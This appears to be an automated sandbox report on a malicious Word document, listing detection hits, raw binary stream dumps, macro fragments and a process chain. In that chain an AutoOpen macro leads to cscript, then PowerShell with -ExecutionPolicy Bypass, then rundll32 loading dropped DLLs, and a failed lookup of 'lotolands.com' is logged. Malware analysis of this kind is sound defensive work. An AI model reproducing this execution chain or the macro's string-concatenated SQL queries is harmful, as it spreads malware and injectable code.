Source: ~DF77272A7F6F18B150.TMP.0.dr	Stream path 'deutsche/o' : .............H..............5...............Tahoma......A........H.,....&...].......5...............Tahoma..................g....R...........K.Qlt..#a........JFIF.....`.`.....FExif..MM...................Q...........Q...........Q..................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(....Y../........]/K..3\.\.#.....=.. u...4...^..Q..........5Md8....v._B....{./.....pT......z_..#......`......y?D....}.E~bI...I..$.........t....rp=.>......_................[.w............'i...+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(........cK.Y....(x...kG.{2H.=....}=.-...H.3..X..u.V......!.q5...X.....:.z)s^Vm.9....R..V....kGn..]O_(..%.+..8.....$.W..w..J.........Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@...QA.P../../..............6.....{\|...H..+....................W.1y$....>..P? ..V...s-...h..-...m].........fUq..lMW{.......~:..Q^....Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@.6X....A..._.'...w.B.........57.v.3.}.........x....b.......8..E.3......K......@..v....W...X.......iv.JV^I.<........J.....M..m_.....QE\|...E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P...._.-^7....R....k..../...........\..W.V.....W....w..O.?...Q]G(QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE........J..?..o....~........J..?..o....
Source: ~DF26415DDA42946BBE.TMP.0.dr	Stream path 'o' : .............H..............5...............Tahoma......A........H.,....&...].......5...............Tahoma..................g....R...........K.Qlt..#a........JFIF.....`.`.....FExif..MM...................Q...........Q...........Q..................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(....Y../........]/K..3\.\.#.....=.. u...4...^..Q..........5Md8....v._B....{./.....pT......z_..#......`......y?D....}.E~bI...I..$.........t....rp=.>......_................[.w............'i...+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(..?.z?./.......K...Q...G....A.........?..g]....?.D?.,d....+...?O(........cK.Y....(x...kG.{2H.=....}=.-...H.3..X..u.V......!.q5...X.....:.z)s^Vm.9....R..V....kGn..]O_(..%.+..8.....$.W..w..J.........Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@...QA.P../../..............6.....{\|...H..+....................W.1y$....>..P? ..V...s-...h..-...m].........fUq..lMW{.......~:..Q^....Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@..Q@.6X....A..._.'...w.B.........57.v.3.}.........x....b.......8..E.3......K......@..v....W...X.......iv.JV^I.<........J.....M..m_.....QE\|...E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P...._.-^7....R....k..../...........\..W.V.....W....w..O.?...Q]G(QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE........J..?..o....~........J..?..o....

Document contains an embedded VBA with base64 encoded strings

Source: VBA code instrumentation

OLE, VBA macro: Module Module3, Function eFile, String ZZZZZZZZZZZZZZZZZZZZZZZZZZZZ

Document contains an embedded VBA macro with suspicious strings

Source: sample.doc.doc	OLE, VBA macro line: RO = Environ("USERPROFILE") & "\AppData\Roaming\"
Source: VBA code instrumentation	OLE, VBA macro: Module Module3, Function eFile, String environ: RO = Environ("USERPROFILE") & "\AppData\Roaming\"	Name: eFile
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Environ_1_(jbxline, ByRef jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Environ As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Environ < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLog "api:" & jbxline & ":Environ"
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Environ_1_ = Environ(jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Environ < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: jbxtresh_Environ = jbxtresh_Environ + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Environ_1_
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: RO = JbxHook_Environ_1_(20, "USERPROFILE") & "\AppData\Roaming\"

Document contains an embedded macro with GUI obfuscation

Source: sample.doc.doc

Stream path 'Macros/deutsche/o' : Found suspicious string wscript.shell in non macro stream

Yara signature match

Source: sample.doc.doc, type: SAMPLE

Matched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects an Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2

Document has an unknown application name

Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr	OLE indicator application name: unknown
Source: ~DFE56B344EF3200177.TMP.0.dr	OLE indicator application name: unknown
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE indicator application name: unknown
Source: ~DF26415DDA42946BBE.TMP.0.dr	OLE indicator application name: unknown

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: sample.doc.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen	Name: AutoOpen
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_4__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2, ByRef jbxparam3)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2, jbxparam3)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_4__ob
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_1__ob 9, con, "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 21, rs, "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " & "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 31, rs, "select * from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 38, rs, "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 42, rs, "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 46, rs, "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 56, rs, "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 60, rs, "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 70, rs, "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " & "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 80, rs, "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 93, rs, "select * from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 115, rs, "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " & "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 125, rs, "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_4__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2, ByRef jbxparam3)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2, jbxparam3)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_4__ob
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_1__ob 9, con, "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 21, rs, "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " & "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 31, rs, "select * from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 38, rs, "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 42, rs, "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 46, rs, "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 56, rs, "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 60, rs, "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 70, rs, "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " & "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 80, rs, "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 93, rs, "select * from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 115, rs, "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " & "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxHook_Open_4__ob 125, rs, "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Private Function JbxHook_Open_1__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Set JbxHook_Open_1__ob_set = jbxthis.Open(jbxparam0)
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob_set
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Sub AutoOpen()
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE, VBA macro line: Set docNow = JbxHook_Open_1__ob_set(31, Documents, .SelectedItems(lr))

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFE56B344EF3200177.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF26415DDA42946BBE.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Document contains no OLE stream with summary information

Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr	OLE indicator has summary info: false
Source: ~DFE56B344EF3200177.TMP.0.dr	OLE indicator has summary info: false
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE indicator has summary info: false
Source: ~DF26415DDA42946BBE.TMP.0.dr	OLE indicator has summary info: false

Document contains embedded VBA macros

Source: sample.doc.doc	OLE indicator, VBA macros: true
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE indicator, VBA macros: true

Source: sample.doc.doc	Virustotal: Detection: 50%
Source: sample.doc.doc	ReversingLabs: Detection: 60%

Source: C:\Windows\System32\cscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................0.......#.................4.....0.........4......./.....`I1........v.....................K8.....................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#................/.k......................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......n.e.d. .a.n. .e.r.r.o.r.:. .(.4.0.4.). .N.o.t. .F.o.u.n.d..."...0................=U.....>.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../................/.k......................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.0.n.............}..v....(.......0................=U.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;................/.k......................n.............}..v....`.......0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............(..k.....@U...............n.............}..v....(.......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G................/.k......................n.............}..v....`.......0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............(..k.....@U...............n.............}..v............0.......................^.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S................/.k....@.................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............(..k.....@U...............n.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._................/.k....8.................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............(..k.....@U...............n.............}..v............0.......................f.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k................/.k......................n.............}..v....(.......0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w....... .......(..k.....@U...............n.............}..v............0................=U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w................/.k....p.................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................(..k.....@U...............n.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k......................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............o.t. .b.e. .r.e.s.o.l.v.e.d.:. .'.l.o.t.o.l.a.n.d.s...c.o.m.'.".0................=U.....@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k......................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.0.n.............}..v............0................=U.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k....P.................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................(..k.....@U...............n.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k....P.................n.............}..v............0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................(..k.....@U...............n.............}..v.....!......0.......................R.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k....."................n.............}..v.....#......0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................(..k.....@U...............n.............}..v.....)......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k.....*................n.............}..v.....+......0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................(..k.....@U...............n.............}..v....H0......0.......................f.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k.....1................n.............}..v.....1......0...............H>U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......(..k.....@U...............n.............}..v.....5......0................=U.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../.k.....5................n.............}..v....H6......0...............H>U.............................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*	Jump to behavior
